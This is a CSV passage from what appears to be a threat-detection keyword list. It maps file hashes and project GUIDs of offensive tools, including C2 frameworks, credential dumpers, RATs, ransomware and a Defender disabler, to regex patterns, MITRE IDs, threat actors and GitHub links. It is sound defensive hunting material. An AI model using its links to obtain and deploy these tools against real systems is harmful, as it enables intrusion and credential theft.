"*41414141-4141-4141-4141-414141414141*",".{0,1000}41414141\-4141\-4141\-4141\-414141414141.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","default SMB challenge https://pbs.twimg.com/media/GHcBPL8a4AA18Jl?format=jpg","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25395"
"*4142dd9b827ddda740d7810e94f28d65a9aedeba637b8e3d785dba1947ccad52*",".{0,1000}4142dd9b827ddda740d7810e94f28d65a9aedeba637b8e3d785dba1947ccad52.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","25396"
"*4146c24d1d9cfa4c6c019fe4a0bd22f7b5d18086b18b7a74a0965e16e7f94bef*",".{0,1000}4146c24d1d9cfa4c6c019fe4a0bd22f7b5d18086b18b7a74a0965e16e7f94bef.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","25398"
"*4153cb9a9c23f7a72a60f0eaf0a615fe95abe975886f65e80afea2be15aea242*",".{0,1000}4153cb9a9c23f7a72a60f0eaf0a615fe95abe975886f65e80afea2be15aea242.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25399"
"*4156a612622946b1daab4b43c632edf80477c45f2bbf55f474ffc33c1cd077f2*",".{0,1000}4156a612622946b1daab4b43c632edf80477c45f2bbf55f474ffc33c1cd077f2.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","25400"
"*415f579b9741f7936312e0320e2da763f7cd9f29903605f3bf1cfa6f28f791f6*",".{0,1000}415f579b9741f7936312e0320e2da763f7cd9f29903605f3bf1cfa6f28f791f6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25403"
"*4161e74ca12ad3a932dba34cf3f9eb2759b66f3a00cfda052381be4304454250*",".{0,1000}4161e74ca12ad3a932dba34cf3f9eb2759b66f3a00cfda052381be4304454250.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25404"
"*416291332a70407df5ff5d79072f5ad68cd802b9*",".{0,1000}416291332a70407df5ff5d79072f5ad68cd802b9.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","25405"
"*4164003E-BA47-4A95-8586-D5AAC399C050*",".{0,1000}4164003E\-BA47\-4A95\-8586\-D5AAC399C050.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","#GUIDproject","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","25406"
"*4164003E-BA47-4A95-8586-D5AAC399C050*",".{0,1000}4164003E\-BA47\-4A95\-8586\-D5AAC399C050.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#GUIDproject","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","25407"
"*4164003E-BA47-4A95-8586-D5AAC399C050*",".{0,1000}4164003E\-BA47\-4A95\-8586\-D5AAC399C050.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#GUIDproject","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","25408"
"*416656DC-D499-498B-8ACF-6502A13EFC9E*",".{0,1000}416656DC\-D499\-498B\-8ACF\-6502A13EFC9E.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","25409"
"*416e6c88a59d32162f3e1d0dfa0b9032b486063509ba4a4ed68f22fa868fb1a4*",".{0,1000}416e6c88a59d32162f3e1d0dfa0b9032b486063509ba4a4ed68f22fa868fb1a4.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25410"
"*41710a6994b2ced4ba4d7931ba0312045ef5532d38ea0072c614f23a0983cc5c*",".{0,1000}41710a6994b2ced4ba4d7931ba0312045ef5532d38ea0072c614f23a0983cc5c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25411"
"*41792ea386bced0624ba2066ed3616167eebb93212f6751e60382c0ba10a9e59*",".{0,1000}41792ea386bced0624ba2066ed3616167eebb93212f6751e60382c0ba10a9e59.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","25412"
"*41794cd59707f4a17fe5736b0960fdd447d5ac35b75d70beb35c71e199b29111*",".{0,1000}41794cd59707f4a17fe5736b0960fdd447d5ac35b75d70beb35c71e199b29111.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25413"
"*417a79ca577c7a337999b7e23372257421360569bf5708d0adc0f356161f35c3*",".{0,1000}417a79ca577c7a337999b7e23372257421360569bf5708d0adc0f356161f35c3.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","25414"
"*417a79ca577c7a337999b7e23372257421360569bf5708d0adc0f356161f35c3*",".{0,1000}417a79ca577c7a337999b7e23372257421360569bf5708d0adc0f356161f35c3.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","25415"
"*417f4c1ad7f0f15d3c01d4930cc583330eb93cf71593c8d872b65a2a50cbb6fc*",".{0,1000}417f4c1ad7f0f15d3c01d4930cc583330eb93cf71593c8d872b65a2a50cbb6fc.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","25416"
"*417f92b83d18cb5d231496fde3d743a34d2f483c26cf831742e30cc11c3963bb*",".{0,1000}417f92b83d18cb5d231496fde3d743a34d2f483c26cf831742e30cc11c3963bb.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","25417"
"*41814257b654a82bc62e877b05af7bf4098a06db44dfd20c246e577fbf88adeb*",".{0,1000}41814257b654a82bc62e877b05af7bf4098a06db44dfd20c246e577fbf88adeb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25418"
"*4181564bd544b3bbb2c49b3b6d800feac2e4438974b650c53ad4882b76d47f92*",".{0,1000}4181564bd544b3bbb2c49b3b6d800feac2e4438974b650c53ad4882b76d47f92.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25419"
"*4182eca7aebb0a2cddd4d7c069fec1295f3fcf3a48d1c2e7f690a7be6e8324e2*",".{0,1000}4182eca7aebb0a2cddd4d7c069fec1295f3fcf3a48d1c2e7f690a7be6e8324e2.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","25420"
"*418835f7a0c331a947db1c4de194394e84c8399d3dcb94cd66182700fc105e49*",".{0,1000}418835f7a0c331a947db1c4de194394e84c8399d3dcb94cd66182700fc105e49.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25421"
"*418c8a25e997241471590accb65f6e6727cd6f62d05f11c2a3b3b9667e39383b*",".{0,1000}418c8a25e997241471590accb65f6e6727cd6f62d05f11c2a3b3b9667e39383b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25423"
"*4192844c08997d6e198c0511821d0b6cdf8c87aa94cb0b2cd249c114e2c75bb6*",".{0,1000}4192844c08997d6e198c0511821d0b6cdf8c87aa94cb0b2cd249c114e2c75bb6.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","25424"
"*4193DE42-C103-45FF-A04D-0AD64616BC59*",".{0,1000}4193DE42\-C103\-45FF\-A04D\-0AD64616BC59.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#GUIDproject","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","25425"
"*41955340b55ee3c2054263a008c141151db9fcc0816b08905771e26e3739f411*",".{0,1000}41955340b55ee3c2054263a008c141151db9fcc0816b08905771e26e3739f411.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","25426"
"*419852f196eaa5b3d51faafd60fa1fee9a6ac5392da93d99e52b8abf2a5552c1*",".{0,1000}419852f196eaa5b3d51faafd60fa1fee9a6ac5392da93d99e52b8abf2a5552c1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25427"
"*4199782412e98076a67fad677ffb17dc66fcd600cd95a8040d44d1ea380c3325*",".{0,1000}4199782412e98076a67fad677ffb17dc66fcd600cd95a8040d44d1ea380c3325.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25428"
"*419a61a91a4de08b2644a68725a73c750535ea50e525ec1aea3dacf47f2ea1ea*",".{0,1000}419a61a91a4de08b2644a68725a73c750535ea50e525ec1aea3dacf47f2ea1ea.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","25429"
"*419ab7aa44c1071066c94e861d508bc7c3751a2e1a495a0369304ac350d5fac7*",".{0,1000}419ab7aa44c1071066c94e861d508bc7c3751a2e1a495a0369304ac350d5fac7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25430"
"*419d762e596871ecea36882eef2d5f2fc99804c069bb8e1852636844faf0a52a*",".{0,1000}419d762e596871ecea36882eef2d5f2fc99804c069bb8e1852636844faf0a52a.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","25431"
"*41a381d6e85d5d47296485417fab7a07c110c98927990415993d75c07f384e3c*",".{0,1000}41a381d6e85d5d47296485417fab7a07c110c98927990415993d75c07f384e3c.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25432"
"*41a60eed20397bb424a1249da58750b837cb759792e06b66218e825c03c54235*",".{0,1000}41a60eed20397bb424a1249da58750b837cb759792e06b66218e825c03c54235.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","25435"
"*41A90A6A-F9ED-4A2F-8448-D544EC1FD753*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD753.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","25436"
"*41A90A6A-F9ED-4A2F-8448-D544EC1FD753*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD753.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","25437"
"*41A90A6A-F9ED-4A2F-8448-D544EC1FD754*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD754.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","25438"
"*41A90A6A-F9ED-4A2F-8448-D544EC1FD754*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD754.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","25439"
"*41A90A6A-F9ED-4A2F-8448-D544EC1FD755*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD755.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","25440"
"*41A90A6A-F9ED-4A2F-8448-D544EC1FD755*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD755.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","25441"
"*41aad6daa162539ca954357d9477850ccc5c1f3d492fafe09091c7419d35a441*",".{0,1000}41aad6daa162539ca954357d9477850ccc5c1f3d492fafe09091c7419d35a441.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","25442"
"*41b565b208250619c33cbb858758cceb6f5382d4d64448eab3b22300257adf4f*",".{0,1000}41b565b208250619c33cbb858758cceb6f5382d4d64448eab3b22300257adf4f.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","25444"
"*41cdbf8d917fa767fb086bb138e1e0cabd305ccfd22db6759fcda4d769a30a93*",".{0,1000}41cdbf8d917fa767fb086bb138e1e0cabd305ccfd22db6759fcda4d769a30a93.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","25448"
"*41d36c482530d7d3a3876cb5d8f5e3a7ba35d154dfc0ea4f73f9f8793f92c387*",".{0,1000}41d36c482530d7d3a3876cb5d8f5e3a7ba35d154dfc0ea4f73f9f8793f92c387.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25451"
